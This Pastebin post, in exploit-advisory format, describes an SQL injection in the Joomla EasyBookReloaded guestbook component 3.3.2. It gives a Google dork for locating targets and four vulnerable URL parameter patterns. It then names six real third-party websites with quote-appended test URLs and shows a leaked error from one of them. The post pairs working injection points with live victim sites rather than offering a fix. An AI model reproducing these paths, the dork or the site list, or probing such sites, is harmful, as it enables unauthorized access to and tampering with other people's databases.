KingSkrupellos

Joomla EasyBookReloaded Components 3.3.2 SQL Injection

Feb 13th, 2019
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.83 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla EasyBookReloaded Components 3.3.2 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/02/2019
  7. # Vendor Homepage : joomla-extensions.kubik-rubik.de
  8. # Software Download Link : joomla-extensions.kubik-rubik.de/downloads/ebr-easybook-reloaded
  9. github.com/Kubik-Rubik/EBR-Easybook-Reloaded
  10. # Software Information Link : extensions.joomla.org/extension/easybook-reloaded/
  11. # Software Affected Version : 2.5 and 3.3.2 compatible with Joomla 3.x
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/index.php?option=com_easybookreloaded''
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. Easybook Reloaded is an easy to use and simple guestbook component
  27.  
  28. for Joomla! which, nevertheless, offers you many useful features.
  29.  
  30. User friendly, powerful guestbook component with many features
  31.  
  32. ####################################################################
  33.  
  34. # Impact :
  35. ***********
  36. Joomla EasyBookReloaded 3.3.2 and other versions -
  37.  
  38. component for Joomla is prone to an SQL-injection vulnerability because it
  39.  
  40. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  41.  
  42. Exploiting this issue could allow an attacker to compromise the application,
  43.  
  44. access or modify data, or exploit latent vulnerabilities in the underlying database.
  45.  
  46. A remote attacker can send a specially crafted request to the vulnerable application
  47.  
  48. and execute arbitrary SQL commands in application`s database.
  49.  
  50. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  51.  
  52. An attacker can exploit this issue using a browser.
  53.  
  54. ####################################################################
  55.  
  56. # SQL Injection Exploit :
  57. **********************
  58. /index.php?option=com_easybookreloaded&controller=entry&Itemid=[SQL Injection]
  59.  
  60. /index.php?option=com_easybookreloaded&view=easybookreloaded&limitstart=[SQL Injection]
  61.  
  62. /index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=[SQL Injection]
  63.  
  64. /index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  65.  
  66. ####################################################################
  67.  
  68. # Example Vulnerable Sites :
  69. *************************
  70. [+] pa-lahat.net/index.php?option=com_easybookreloaded&controller=entry&Itemid=41%27
  71.  
  72. [+] capoeirasweden.se/iecapoeira/index.php?option=com_easybookreloaded&view=easybookreloaded&limitstart=30%27
  73.  
  74. [+] elivaniacosta.com.br/new/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=79%27
  75.  
  76. [+] let.elternvertretungen.de/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=76%27
  77.  
  78. [+] eneos-blond.de/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=60%27
  79.  
  80. [+] reise.pulverl.at/index.php?option=com_easybookreloaded&view=easybookreloaded&Itemid=53%27
  81.  
  82. ####################################################################
  83.  
  84. # Example SQL Database Error :
  85. ****************************
  86. Strict Standards: Non-static method JLoader::import() should not be
  87. called statically in /home/elivania/public_html/new
  88. /libraries/joomla/import.php on line 29
  89.  
  90. ####################################################################
  91.  
  92. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  93.  
  94. ####################################################################
Add Comment
Please, Sign In to add comment